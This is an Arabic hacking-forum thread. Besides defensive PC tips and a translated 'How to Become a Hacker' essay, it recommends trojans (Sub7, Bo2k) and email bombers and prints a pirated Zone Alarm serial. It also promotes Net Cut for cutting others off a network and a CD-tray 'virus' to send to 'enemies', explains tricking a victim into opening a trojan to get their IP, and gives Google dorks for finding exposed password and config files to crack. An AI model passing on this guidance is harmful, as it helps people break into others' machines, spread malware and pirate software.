3: التأكد من تحديث الانتي فايروس كل اسبوع على الاقل (شركة نورتون تطرح تحديث كل يوم او يومين)

4: وضع Firewall جيد

5: وضح Anti-Virus جيد

6: ايقاف خاصية مشاركة الملفات :-

control panal / network / configuration / file and print sharring

i want to be able to give others access to my files

الغي التحديد

ثم ok

7: لا تظل مدة طويلة متصل بالشبكة بحيث لو ان واحد دخل عليك ما يظل يخرب فيك و عند خروجك و دخولك

مره اخرى للشبكة يغير اخر رقم من الايبي

8: و هذا الموقع يفحص جهازك و يخبرك بنقاط الضعف و الحلول

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

9: لا تخزن كلمات المرور او كلمات اسر على جهازك (مثل كلمة المرور لاشتراكك في الانترنت او البريد الكتروني او ...)

10: لا تفتح اي ملفات تكون وصلة على بريدك الا بعد التأكد من نظافتها ..

11: اذا لاحظت حدوث اي شئ غريب مثل حلل في اي برامج او خروج و دخول السي دي افصل الاتصال فورا و تأكد من نظافة الجهاز



================================================== ==================================================

=====





افضل البرامج

-------------



برامج الهاك

============



برامج هاك الاجهزه

-----------------

Sub 7 , Bo2k , Netbus , net devil.dos,,lithium , nova, executer,وغيره من الكثير unicode,tafek,vampire,ftp,winshell



والافضل Bo2k ولكن الاكثر انتشارا Sub7



بالنسبة لي انا لا احبذ البرامج احب الأختراق عن طريق الثغرات ولك للبرامج اهميتها بعض الشىء



برامج تدمير البريد

------------------

Aenima , Kaboom , euthan , emailbomber , Death & Destruction Email Bomber v4.0 -

Aenima الافضل و الاسرع





aenima_V20





haktek





Euthan V1.5





Death & Destruction Email Bomber v4.0





Bounce Spam Mail V1.4





AnonyMail



================================================== ===========================================



برامج اكتشاف ثغرات المواقع

---------------------------

Voideye , Shadow Scan Security (SSS)

والافضل SSS وهو يعتبر مكتبة برامج هاك متكامله و سنتكلم عنه لاحقا





Shadow Scan Security V.3.7





Crack V.3.7





wwwhack , webcracker , MungaBunga

الاقضل MungaBunga





Brut us A2





GoldenEye V1.0



================================================== ===========================================



برامج الحماية (فير وول)

------------------------

Zone alarm , Tiny Personal Firewall 2.0.14 , Noewtach وBlackICE Defender v2.5 co

الافضل Zone alarm









Norton Internet Security 2001 v 2.5 Family Edition





Tiny Personal Firewall 2.0.14





Zone alarm

S/N dk68s-vfgfv-wh0jt-wnm68g-kx0w00



LOCKDOWN Millennium V8.1.1

LOCKDOWN Millennium V8.1.1





Intruder Alert '99

================================================== ===========================================



برامج مقاومة الفيروسات

-----------------------

Norton Anti-Virus , Mcafee , Pc-cillin

عندما يكون عدد الفيروسات مبير افضل Pc-cillin اما اذا عدد قليل Norton الافضل





AntiViral Toolkit Pro (AVP) Gold



AntiViral

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

2 : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

3 : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

4 : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

5 : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

6 : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

7 : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

8 : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

9 : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

10: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]



وفي النهاية احب ان اوضح لكم شيىء والكثير من الهاكرز بعالمنا العرب او المبتدأين يجهلونه لكن تكون هاكر يجب ان تكون على علم بما يلي :

1:ان تكون ملما بللغة الأنجليزية.

2:ان تكون ملما بمعظم انظمة التشغيل وخاصة اليونكس واللينكس والتى لا غنى عنها بأختراق المواقع.

3:ان تكون ملما بأوامر ال regestry

4:ان تكون ملما على الأقل بأربع لغات برمجة كلغة php او visual basic او جافا و perl وغيرها..

5:ان تتابع اخر اخبار الثغرات.

6:ان تتابع المواقع الغربية لأن المواقع العربية لما تصل سوا لاى 10% مما توصل له الغرب..

8: يجي ان تعلم ان الهاك 80% مخ وذكاء و10 % برامج

9:ان تكون ملما بال ftp وال telnet وال Dosلأن الهاك بدأ منها وهي اقوى من البرامج واستخدامها لا يضر بجهازك بعكس البرامج الجاهزة اللي لا تعلم ماذا يكون مدموج فيها..

10:يجي ان تعلم ان اختراق الأجهزة والأيميلات اصبحت من العاب الأطفال يجي ان تتجه الى اختراق المواقع واليرفرات والشبكات..

عندما تتطبق السابق يمكن ان تقول عن نفسك ان هاكر ...



في النهاية اتمنى اني اكون وفقت في أفادتكم
الرجوع الى أعلى الصفحة اذهب الى الأسفل
Admin
Admin
Admin


عدد الرسائل : 6208
العمر : 52
الموقع : https://borae.yoo7.com
تاريخ التسجيل : 08/06/2008

من  اسرار المحترفين فى النت  Empty
مُساهمةموضوع: رد: من اسرار المحترفين فى النت    من  اسرار المحترفين فى النت  Emptyالخميس 15 يوليو 2010 - 10:25




السلام عليكم ورحمة الله

برنامج Net cut يقطع الانترنت عن اى جهاز معك بالشبكة دون سيرفر او اى شىء

عند تشغيل البرنامج انتظر قليلا حتى يظهر لديك الايبيات المتصلة معك بالشبكة اضغط على الايبى المراد قطع الانترنت عنة ثم اضغط
Cut Off لقطع الانترنت عنة ولاعادة تشغيلة مرة اخرى اضغط Resume

معتمد و مجرب من مجموعة اصحاب كول

اترك ردا و استمتع في القضاء على مقهى النت او السايبر السيء
تحميل البرنامج


البرنامج الثانى

هذا البرنامج هو جميل جدا و يستخدم لإعطاء تفاصيل عن الموقع الذي تريد اقتحامه معتمد و مجرب من قبل مجموعة اصحاب كول وبالفعل هذا البرنامج يريحك من الكثير من الأمور التي تسعى للبحث عنها هذا البرنامج لا يحتاج الى كراك بل هو مجاني

لا تنسو وضع ردودكم في الأسفل

تحميل البرنامج


البرنامج الثلاث

فايروس يفتح السي دي و لا يسكره حتى لو اعدت تشغيل الجهاز
اصحاب كول
اضغط هنا للتحميل
##################################
هذا الفايروس لا ينصح بتجريبه على جهازكم الخاص - فقط يتم إرساله للأعداء
مميزات الفايروس
يفتح السي دي بمجرد الضغط عليه ووداعا لإغلاق السي دي
غير مكتشف من اي برنامج مراقبة و لايتوقع اكتشافه
حتى لو تم إعادة تشغيل الكمبيوتر من جديد يبقى الحال كما هو يفتح السي دي بمجرد الدخول الى الوندوز
==============
هذا الفايروس حصري ومصمم من قبل منتدا اصحاب كول نتمنى ان تتركو ردا لنا في


تحياتى لكم وفى انتظار ردودكم

لكم حالص تحياتى

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الرجوع الى أعلى الصفحة اذهب الى الأسفل
Admin
Admin
Admin


عدد الرسائل : 6208
العمر : 52
الموقع : https://borae.yoo7.com
تاريخ التسجيل : 08/06/2008

من  اسرار المحترفين فى النت  Empty
مُساهمةموضوع: رد: من اسرار المحترفين فى النت    من  اسرار المحترفين فى النت  Emptyالخميس 15 يوليو 2010 - 10:28


|--*¨®¨*--|بسم الله الرحمن الرحيم|--*¨®¨*--|
-----
~*¤ô§ô¤*~السلام عليكم ورحمة الله وبركاته~*¤ô§ô¤*~
--
شلونكم شخباركم وش مسوين .. الحمدلله .. جعله دووم

عدنا لـدورة إختـراق الأجهــزة وأتمنى أنها تكون في ميزان حسناتي لا في ذنوبي وهذا يترتب عليكم بعد الله ارجوا عدم استخدام الدورة ضد إخوانكم العرب والمسلمين
لأنهم بصراحة مو ناقصين وانا برئ من كل عمل يغضب الله
..
أولا ثق دايماً ان الاختراق 90% ذكـا ء << بصراحة من اللي تحطم

وانا حبيت يكون الشرح بهالموضوع عبـارة عن أسئلة حتى تنفهم أكثـر
-
نبدأ باسم الله :-
س / الحين يقولون هكر هكر وش هم ذولا ياخي ؟
ج / شف .. الهكر ذولا ناس خبيرين بالكمبيوتر ومبرمجين ودارسين الكومبيوتر دراسه بثغراته وبكل شي فيه أول كانوا يسمون هالإسم للي يخربون الأجهزة ويدمرون الشبكات الحين لا يسمونهم كراكرز
س/ طيب والهاكرز وين راحوا الحين ؟
ج / حلوة وين راحوا:D .. لا هم ما راحوا . بس انهم استخدموهم الحين في أعمال الخير بحيث مثلا يخترق جهازك بنية انه يخبرك بالثغرات المفتوحة فيه وينبهك بس بدون ما يخرب جهازك (( كذلك في المواقع )) هذولا الهكرز أصلاً
س / طيب شلون يخترقون جهازي ؟
ج / شف اختراق الأجهزة نوعين أصلا َ عشوائي (( يعني يدور الاجهزة اللي تقولك (اخترقني ) ويسوي الواجب وفي اختراق مقصود .. يعني ناوي الجهاز ذا يعني ذا
س / طيب الاختراق العشوائي وفهمناه .. بس شلون يخترق جهاز قاصده ؟
ج / يحدده أول شي ثمن يخترقه
س / طيب شلون يحدده . ؟
ج / بعنوان الجهاز .:. الحين كل جهاز له عنوان يسمونه ( آي بي آدرس IP Address ) اذا حصله يكون حدد الجهاز
س / طيب شلون يحصل الآي بي ؟
ج / شف الآي بي هالأيام ما صار مشكلة مثل أول فيه برامج فيه عن طريق الدوس وفيه وفيه ..
س / طيب ياليت تعلمني ؟
ج / الحين لما يكون عند برنامج اختراق مثلاً الضحية يكلمك على الإيميل وتبي تخترقه وتطلع الآي بي انت حترسله الباتش وهو أول ما يفتح الباتش بتوصلك تبليغات بالآي بي سواء ً عن طريق الإيميل او صفحة السي جي آي .() على حسب تبليغك ()
س / طيب انت قلت أول عن طريق الدوس شلون ؟
ج / لما تكلم الضحية على الايميل ارسله اي رسالة (( تكون أكبر من 25 كيلو بايت )) ثمن رح لإبـدأ> تشغيل > اكتب في صندوق تشغيل (( cmd )) بتطلع لك الشاشة السوداء اكتب فيها netstat -n وآي بي اللي تراسله تلقاه آخر واحد بهالشكل .. مثلاً :: 212.85.71.44 وفي طرق غيرها
س/ طيب الحين انا ابي اصير هكر .. وش رايك في اللغة الانجليزية لازم منها والا مب ضروري ؟
ج / (( وجه مندهش ومرتفع ضغطه )) اسمح لي سـؤال غبي أكـيد لازم منها أولاً عشان تفهم الشروحات الأجنبية وبعدين ترى العرب حتى الحين ما وصلوا ولا حتى 10% من الغرب للأسف
<<<<<<< اصلا ما عنده لغة .. بس قريب بياخذ كورس
س/ طيب مافي حاجات ثانية احتاجها عشان اصير هكر؟
ج / اوهووووو إلا في كثيير مثلا لازم يكون عندك لغة أخرى .. مثلا ( ( ا لبي اتش بي ، الفيجول بيسك ، البيرل ...)) بس انا اقولك خذها حبة حبة .. اصبر . الصبر زين تعلم الطريقة بعدين تعلم اللغات
س / طيب وهي اشهر البرامج الموجودة ؟
ج / كثير ..عند السب سفن.. والبرورات ... النت بص .. الديب ثروت .
.
س / طيب لو قلت لك بصير هكر في اربعة اشهر ؟ وش رايك ؟!
ج / والله رايي انك .. تخسي ولا 4 سنوات . بس لا تيـأس
س / طيب نصيحة ؟
ج / لا تحـاول تخترق موقع مسلم او جهاز مسلم انصحك والا ترى الله بيردها بخشتك

أخيرا حبيت اضيف شي لأنه أخوي ولد الأحساء فاهم الإختراق بالدوس غلط
.
_ لما تسمع بالأختراق عن طريق الدوس فتيقن 99% فهو نفسه الإختراق عن طريق الثغرات يعني مو معقولة الإختراق عن طريق الثغرات يكون إنك تقول للكومبيوتر اخترق صاحب الآي بي ذا وهو ينفذ

بالنسبة للواحد بالمئة الباقية فهي إما يكون يغير امتداد باتش او شي زي كذا يستطيع فعله بالدوس

جميع الحقوق محفوظة لي

تحياتي


رد باقتباس
الرجوع الى أعلى الصفحة اذهب الى الأسفل
Admin
Admin
Admin


عدد الرسائل : 6208
العمر : 52
الموقع : https://borae.yoo7.com
تاريخ التسجيل : 08/06/2008

من  اسرار المحترفين فى النت  Empty
مُساهمةموضوع: رد: من اسرار المحترفين فى النت    من  اسرار المحترفين فى النت  Emptyالخميس 15 يوليو 2010 - 10:31

في هذا الموضوع سوف يبحر الجميع في Google ويكتشف اسرار ووسائله المساعدة التي يحتاجها المبتدئون بكثرة بغض النظر عن المحترفون .

من المعروف أن Google من أكثر واكبر محركات البحث استعمالا في كافة انحاء العالم لذلك سوف يتكلم موضوعنا وباختصار عن Google وكيف يمكننا استخدامه ليسهل علينا الطرق نحو الأختراق.

Google

أولا سنتكلم عن البحث في المواقع --:
النص المخفى :
سنستخدم الامر allinurl في البحث عن ملفات داخل برمجيات معينة مثل WWWBaord
لذلك استخدم الامر allinurl:wwwboard/passwd.txt
الحين ابحث
ماذا وجدت ؟؟!
نتائج كثيرة وعند دخولك الى اي موقع فيه هذا الملف سوف تجد الباسوورد مشفر بمقياس DES الحل لفكه هو استخدام البرنامج الشهير John The Ripper

وايضا الامر allinurl تقدر تستخدمه في البحث داخل موقع عن ملف password مثل هذا الشكل
allinurl: passwd.txt site:virtualave.net

أو
allinurl:config.txt site:.jp
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] site:.edu
للبحث عن ملفات معينة في كافة المواقع الموجودة في Google .


ثانيا البحث عن مايحتويه Index أي موقع ومافيه من ملفات --:
مثال/
"Index of /admin"

"Index of /secret"

"Index of /cgi-bin" site:.edu

وراح تلاقي معلومات راح تخدمك في الاختراق واحيانا تلاقي ان لك صلاحيات في انك تغير INDEX نفسه !


ثالثا البحث عن ملفات مهمة --:
يمديك تسوي هذي الحركة بكتابة هذا الامر
filetype:.doc في Google وراح تجد الملف المطلوب .
وتقدر ايضا تستخدم هذا filetype:.doc site:.mil

بالنسبة للاشخاص الي متابعين الثغرات أكثر شي يسوونه :
ثغرات البرمجيات او المنتديات واللوح يذهبون لـGoogle بغرض ايجاد منتدى بنسخة معينة
مثلا نفرض انك لقيت ثغرة Vbulletin 2.2.1
نكتب في Google
powered by Vbulletin 2.2.1


رابعا موضوع ليس له علاقة بالهكرز انما بالبحث فقط !!
كثير مايسئلنا اشخاص في المنتدى ارجوك احضر لنا هذا البرنامج او اريد هذا البرنامج او لدي ملفات مفقودة
ماهو الحل ؟!
الحل Google عندما يطلبني اي شخص في المساعدة في البحث عن برنامج لنفرض برنامج
kunag
ماذا أفعل ؟
لدي عدة طرق للبحث عن هذا البرنامج
هي انك تضيف كلمة zip مثلا
kuang.zip وشف النتايج الي تطلع
او exe
kunag.exe
او فيه طريقة انك تضيف كلمة download
مثل
kunag downlod
او تضيف كلمة hacker
kuang hacker
فيه أكثر من طريقة للبحث عن البرنامج
أرأيت في غاية السهولة !!!!!


رد باقتباس
الرجوع الى أعلى الصفحة اذهب الى الأسفل
Admin
Admin
Admin


عدد الرسائل : 6208
العمر : 52
الموقع : https://borae.yoo7.com
تاريخ التسجيل : 08/06/2008

من  اسرار المحترفين فى النت  Empty
مُساهمةموضوع: رد: من اسرار المحترفين فى النت    من  اسرار المحترفين فى النت  Emptyالخميس 15 يوليو 2010 - 10:33

كل مايخص الهكرز أرجوا التثبيت


كل مايخص الهكرز
من هو الهاكر؟
ثقافة الهاكرز
1- العالم مليئ بالمشاكل التي تنتظر الحل
2- لا يجب أن تحل مشكلة ما أكثر من مره
3- الملل و العمل الشاق سيئين
4- الحرية جيدة
5- المظهر لا يغني عن القدرات
مهارات الهاكر الأساسية
1- تعلم البرمجه
2- احصل على أحد أنظمة يونكس مفتوحة المصدر و تعلم كيفية تشغيله و استخدامه
3- تعلم كيفية استعمال الورلد وايد ويب و كيفية كتابة HTML
4- إذا لم تكن تعرف الإنجليزية، إبدأ في تعلمها
المكانة في ثقافة الهاكرز
1- قم بكتابة برامج مفتوحة المصدر
2- ساعد في تجربة و اصلاح البرامج مفتوحة المصد
3- انشر معلومات مفيدة
4- ساعد على ابقاء البنية التحتية فعاله
5- قم بخدمة ثقافة الهاكرز نفسها
علاقة الهاكرز بالمنعزلين عن الحياة العامة (Nerds)
أشياء للمظهر
مصادر أخرى
الأسئلة الأكثر شيوعا



لماذا كتبت هذا المقال؟


كمحرر لقاموس لمصطلحات الهاكرز jargon file و مؤلف العديد من المقالات القريبه من هذا المجال يصلني العديد من الرسائل من هواة شبكات الحاسب الآلي الجدد ليسألونني "كيف يمكنني أن أصبح هاكر؟". في العام 1996 لاحظت عدم وجود أي مستندات تشرح هذا الموضوع فبدأت في كتابة هذا المقال. العديد من الهاكرز يعتبرون هذا المقال جازم في توضيح هذا الموضوع و لكني لا اعتبرنفسي الجهة الحصرية المسئولة عن هذا التعريف، إذا لم يعجبك ما هو مكتوب هنا قم بكتابة نسختك الخاصه.


لاحظ وجود قائمة بالأسئلة الأكثر شيوعا في آخر المقال، برجاء قراءة هذه الأسئلة و أجوبتها قبل أن تقوم بمراسلتي.
يوجد العديد من النسخ المترجمه من هذا المقال للغات عديده هي: البلغارية،الكتلونية،الصينية المبسطه،الصينية،الدنماركية، الهولندية،الفارسية، الفنلندية،الألمانية،العبريه،الهنغارية،الإيطالية،ال يابانية،البولندية،البرتغاليه،الإسبانية،التركيةوالس ويدية.


لاحظ أن هذه الترجمة للمقال قد لا تكون دوما متماشية مع المقال الأصلي بسبب التعديل الذي يطرأ باستمرار على المقال.


الرسم الذي يمثل خمس نقاط في المخطط المكون من تسع خانات يسمى glider. و هي مبنية على لعبه رياضيه و ذات خواص رياضيى رائعة أذهلت الهاكرز لسنين طويله. أعتقد أن هذه الصورة شعار جيد ليصف الهاكرز، في البداية تبدوا غامضة و لكنها البوابة لعالم له منطقه الخاص به. إقرأ المزيد عن شعار glider من هنا


من هو الهاكر؟


في Jargon File يوجد العديد من التعريفات للمصطلح "هاكر"، معظمها يصف خبرة تقنية و سعاده بحل المشكلات و تخطي الحدود. إذا كنت تريد أن تعرف كيف كيف تصبح هاكر هناك تعريفين فقط يجب أن تعرفهما.


يوجد مجتمع، حضارة مشتركة من المبرمجين المحترفين و خبراء الشبكات بدأت منذ عقود من الزمن منذ ظهور الحواسيب الصغيرة و تجارب ARPAnet المبكرة. أوجد الأشخاص المنتمين لهذا المجتمع المصطلح "هاكر"، الهاكرز هم من بنوا الإنترنت، الهاكرز هم من جعلوا نظام التشغيل يونكس ما هو عليه اليوم، الهاكرز هم من جعلوا الورلد وايد ويب تعمل، إذا كنت منتميا لهذه الحضارة، إذا كنت قد ساهمت بها و يوجد أشخاص آخرون منتمون لها و يعرفونك و يطلقون عليك لقب هاكر إذا فأنت هاكر.


عقلية الهاكر ليست مقتصرة على حضارة هاكرز البرمجيات فقط. يوجد أشخاص لديهم نفس العقلية و نفس طريقة التفكير في مجالات أخرى مثل الموسيقى و الإلكترونيات. في الحقيقه قد تجد هذه العقلية في أعلى مستويات أي علم أو فن. هاكرز البرمجيات يتعرفون على هذه العقليات في أي مجال آخر و يطلقون على هؤلاء الأشخاص هاكرز أيضاً. و يقول البعض الآخر أن عقلية الهاكر منفصله عن الوسط الذي يعمل به و لكن في بقية هذا المقال سوف نتحدث عن المهارات و الصفات الأساسية لدى هاكر البرمجيات و التقاليد المتعارف عليها في تلك الحضارة التي أطلقت كلمة "هاكر".


يوجد مجموعة أخرى من الأشخاص يطلقون على أنفسهم لقب هاكرز بكل وقاحة و لكنهم ليسوا كذلك. هؤلاء هم من يشعرون بالسعاده عند إختراق بعض نظم الحاسب أو التصنت على خطوط الهاتف. الهاكرز الحقيقيون يسمون هؤلاء "كراكرز" ولا يودون أن يكون لهم أية علاقه بهم. الهاكرز الحقيقيون يظنون أن الكراكرز غير جديرون بتحمل المسئولية و كسولين و ليسوا على قدرة كبيرة من الخبره. لا تجعلك القدرة على اختراق نظام ما هاكر فإذا استطاع شخص ما سرقة سيارة ما بدون استخدام مفتاحها هل يجعله ذلك مهندس ميكانيكا؟!. للأسف قام بعض الكتاب و الصحفيين باستخدام كلمة "هاكر" ليصفوا الكراكرز و هذا التصرف يسبب الإزعاج الشديد للهاكرز.


الفرق بسيط و واضح: الهاكرز يقومون بالبناء، الكراكرز يقومون بالهدم.


إذا كنت تريد أن تصبح هاكر فاستمر بالقراءة. إذا كنت تريد أن تصبح كراكر فاذهب و قم بقراءة أخبار alt.2600 و استعد لقضاء ما بين خمس لعشر سنوات في السجون بعدما تكتشف أنك لست ذكيا كما كنت متصورا. و هذا هو كل ما سأقوله عن الكراكرز.






ثقافة الهاكرز


1- العالم مليئ بالمشاكل التي تنتظر الحل
2- لا يجب أن تحل مشكلة ما أكثر من مره
3- الملل و العمل الشاق سيئين
4- الحرية جيدة
5 - المظهر لا يغني عن القدرات


يقوم الهاكرز بحل المشاكل و بناء الأشياء. و يؤمنون بالحرية و بالعمل التطوعي. لكي تعرف كهاكر يجب أن تتصرف بهذا المنطق. و لكي تتصرف بهذا المنطق يجب أن تؤمن بهذا المنطق. و لكن إذا ادعيت الإيمان بهذه المبادئ لكي تكتسب القبول في هذا المجتمع فسوف تفقد الهدف الأساسي. إيمانك بهذه المبادئ مهم بالنسبة إليك فسوف يساعدك و يدفعك إلى التعلم. مثل كل الفنون الإبداعية أفضل الطرق لتصبح المعلم هو أن تفكر بعقل المعلم ليس فقط فكريا و انما عاطفيا أيضاً.


أو كما تقول القصيدة:



To follow the path:
look to the master,
follow the master,
walk with the master,
see through the master,
become the master.


و معناها: راقب المعلم، اتبع المعلم، امشي مع المعلم، انظر عبر المعلم، كن المعلم.


لذا إذا أردت أن تصبح هاكر ردد هذه الكلمات حتى تؤمن بها.


1- العالم مليئ بالمشاكل التي تنتظر الحل


كونك هاكر سيصبح مصدر للمرح و لكنه مرح يحتاج لمجهود شاق. هذا المجهود يحتاج إلى دافع، يحصل الرياضيون على الدافع من نوع السعاده عند جعل أجسادهم في حالة أفضل، في تخطي حدود طاقتهم الجسدية. بالمثل، لتصبح هاكريجب أن تحصل على السعادة من حل المشكلات، تطوير مهاراتك، و تدريب و استعمال ذكائك.


إن لم تكن من هذا النوع من الأشخاص بطبيعتك فسوف تحتاج أن تصبح واحدا منهم لكي تنجح كهاكر. و إلا سوف تجد أن قدراتك مهدرة على مصادر الإلهاء الأخرى.


يجب أيضا أن يكون لديك إيمان بقدرتك على التعلم. إيمان بأنك حتى لو لم تكن على علم بكيفية حل المشكله ككل فسوف تتعلم أول جزء من الحل و هذا سيوصلك للجزء التالي ثم إلى الجزء الذي يليه حتى تقوم بحل المشكله كلها.


2- لا يجب أن تحل مشكلة ما أكثر من مره


العقول المبدعة عملة نادره لا يجب أن تهدر على إعادة اختراع العجله بينما يوجد العديد من المشاكل الجديده التي تنتظر منك حلها.


لكي تتصرف مثل الهاكرز يجب أن تؤمن بأن الوقت الذي يضيعه الهاكرز في التفكير هو وقت غالي لدرجة أنه من واجبك أن تشارك المعلومات و أن تقوم بحل المشكلات و من ثم أن تشارك الحل مع الجميع ليتمكن الهاكرز الآخرون من حل مشاكل جديده بدلا من الإضطرار لإعادة حل مشكلات قديمة.


لا يجب أن تؤمن بأنه عليك التبرع بكل إبداعك الفكري بالرغم من أن الهاكرز الذين يفعلون هذا يحصلون على أكبر قدر من الاحترام من الهاكرز الآخرين. من ضمن فكر الهاكرز أنه عليك أن تقوم ببيع جزء و لو بسيط من انتاجك لتحافظ على مستواك المعيشي. من العادي أن تستغل قدراتك كهاكر لتنشئ عائلة أو لتصبح غنيا طالما لم تنسى ولائك لفنك و لزملائك من الهاكرز.


3- الملل و العمل الشاق سيئين


لا يجب أن يشعر الهاكرز (و المبدعين عموما) بالملل أو أن يقوموا بعمل تكراري غبي و شاق. ففي هذه الحاله إنهم لا يقومون بما يستطيعون عمله و هو حل مشاكل جديده. هذا التضييع للوقت مضر للجميع. لذلك فالعمل الممل ليس سيئ فحسب بل هو سيئ للغاية.


لتتصرف كهاكر يجب أن تؤمن بهذا كفاية حتى تحاول دائما أن تقوم بإخراج هذا النوع من العمل من حياتك بقدر المستطاع، ليس لك فحسب و لكن لكل الآخرين و خصوصا الهاكرز.


يوجد استثناء واحد لهذا و هو أن يقوم الهاكرز في بعض الأحيان بعمل بعض هذه الأعمال كنوع من تصفية الذهن أو لتعلم شئ جديد لا يمكن تعلمه إلا بهذه الطريقة. و لكن هذا الشئ يكون باختيار الهاكر دائما. لا يوجد شخص عاقل قد يمكن دفعه إلى موقف يصيبه بالملل.


4- الحرية جيدة


الهاكرز بطبيعتهم رافضين للسلطة عليهم. أيا كان من لديه القدرة على إعطائك الأوامر يمكنه منعك من حل مشكلة قد تجد أنت في حلها متعه. و بالنظر للعقلية المحبة للسلطة، فسوف يجد دوما تفسير أبله لمنعك. لذلك يجب دوما محاربة التسلط أينما وجدته خشية أن يؤثر عليك و على الهاكرز الآخرين.


ليس هذا مثل محاربة كل السلطات. الأطفال بحاجه إلى التأديب و المجرمين بحاجه إلى العقاب. يمكن أن يوافق الهاكر على بعض أنواع السلطة عليه لكي يستطيع الحصول على شئ يريده. و لكن هذا ليس أكثر من نوع من المقايضة أما نوع الاستسلام الذي يريده الفاشيستيين ليس مسموح به.


يحب الفاشيستيين الرقابه و السرية و لا يثقون في التعاون التطوعي و مشاركة المعلومات، نوع التعاون الذي يحبونه هو التعاون الذي يستطيعون التحكم به. لذلك لكي تصبح هاكر يجب أن يكون لديك رفض للرقابه و السريه و يجب أن يكون لديك الاستعداد للتصرف بناء على هذا الإعتقاد.


5- المظهر لا يغني عن القدرات


لكي تصبح هاكر يجب أن يكون لديك هذه الثقافه التي تحدثنا عنها و لكن ليس وحدها. هذه الثقافه لن تغنيك عن القدرات التي يجب أن تتوفر لدى الهاكر. لكي تصبح هاكر سوف يتطلب منك هذا ذكاء و مجهود و تفاني و عمل شاق. لذلك يجب أن تتعلم أن لا تثق بالمظاهر و أن تحترم كل أنواع القدرات. لن يدع الهاكرز المستعرضين يضيعون وقتهم و لكنهم يحترمون القدرات و بالذات القدرات في الهاك. و لكن القدرات في أي مجال جيده. القدرة في طلب المهارات التي لا يستطيع الحصول عليها الا القليلين، المهارات التي تتطلب حدة عقلية و الحرفية.


إذا كنت تحب أن يكون لديك قدرات فسوف تستمع بتطويرها فيك، سيصبح العمل الشاق نوع من اللعب و المتعه لديك. هذا الصفة ضرورية لتصبح هاكر.






مهارات الهاكر الأساسية


1- تعلم البرمجه
2- احصل على أحد أنظمة يونكس مفتوحة المصدر و تعلم كيفية تشغيله و استخدامه
3- تعلم كيفية استعمال الورلد وايد ويب و كيفية كتابة HTML
4- إذا لم تكن تعرف الإنجليزية، إبدأ في تعلمها


طريقة تفكير الهاكر مطلوبة و لكنها لا تغني عن المهارات الأساسية التي يجب أن تتوفر لديه قبل أن يستطيع أي شخص أن يلقبه بلقب هاكر.


هذه المهارات تتغير ببطئ عما قبل مع مرور الزمن و مع خلق التكنولوجيا لمهارات جديده. فمثلا كانت هذه المهارات من قبل تتضمن تعلم لغة الآلة و مؤخرا تضمنت كتابة HTML. بالنسبة للوقت الحالي فهذه المهارات تتضمن التالي:


1- تعلم البرمجه


هذه بالتأكيد هي المهارة الأساسية لدى الهاكر. إذا لم تكن تعلم أي من لغات الحاسب الآلي أنصحك بالبدأ بتعلم لغة python. يوجد وثائق تعليمية جيده لها و سهلة للمبتدئين. و بالرغم من كونها لغة جيده للبدأ بها فهي ليست لعبة بل انها لغة ة و مناسبة للمشاريع الكبيرة. لقد قمت بكتابة تقييم أكثر تفصيلا عن البايثون تجده هنا. و يوجد دروس تعليمية جيده على موقع بايثون الرسمي.


الجافا لغة برمجة جيده أخرى. هي أصعب من البايثون و لكنها تنتج كود أسرع من البايثون. برأي انها تمثل أفضل اختيار ثاني لك. لأسف فالتطبيق المرجع الخاص بشركة صن مازال غير حر. و لكن ليست هذه المشكلة في لغة الجافا نفسها حيث يوجد مترجمين عاليي الجودة و مفتوحين المصدر للجافا. المشكلة الحقيقية تكمن في المكتبات التي تأتي مع لغة البرمجة. المكتبات مفتوحة المصدر أقل جودة من الخاصه بشركة صن. لذلك فإذا اخترت تعلم الجافا قم بالتعلم بواسطة أحد التطبيقات مفتوحة المصدر بدلا من الاعتماد على تطبيق صن المغلق المصدر.


لكن احذر، لن تصل إلى مستوى الهاكر أو حتى المبرمج إذا تعرفت على لغة برمجة واحده أو اتنتين. يجب أن تتعلم كيفية التفكير في المشاكل البرمجية بشكل عام. مستقلا عن أية لغة برمجة. لكي تصبح هاكر يجب أن تصل إلى مستوي حيث يمكنك تعلم لغة برمجة في أيام عن طريق ربط ما هو موجود في كتيب هذه اللغه بما تعرفه انت مسبقا. و هذا يعني تعلمك للعديد من لغات البرمجة.


اذا بدأت في التعمق في برمجة جدية فسوف يجب عليك تعلم لغة السي، قلب نظام التشغيل يونكس. لغة السي++ قريبه جدا من لغة السي، إذا تعلمت واحده فسوف يصبح من السهل عليك تعلم الأخرى. ليست أي منهما الاختيار الصحيح لكي تبدأ به. في الحقيقة كلما استطعت الابتعاد عن البرمجة بالسي كلما أصبحت أكثر انتاجية.


السي لغة ة و موفرة لمصادر جهازك ولكن لكي توفر السي هذه الميزة يتوجب عليك عمل العديد من الوظائف بنفسك للتحكم في المصادر ( كالذاكرة مثلا). كل هذه الشيفرة البرمجية تزيد من احتمالات الخطأ و سوف تتطلب منك وقت أطول في تتبع الأخطاء بالبرنامج. هذه الميزة ليست في غاية الأهمية هذه الأيام مع وجود أجهزة ة كالموجودة حاليا. يفضل استخدام لغة برمجة تقوم بإهدار مصادر الجهاز و لكنها ستقوم بتوفير وقتك مثل البايثون.


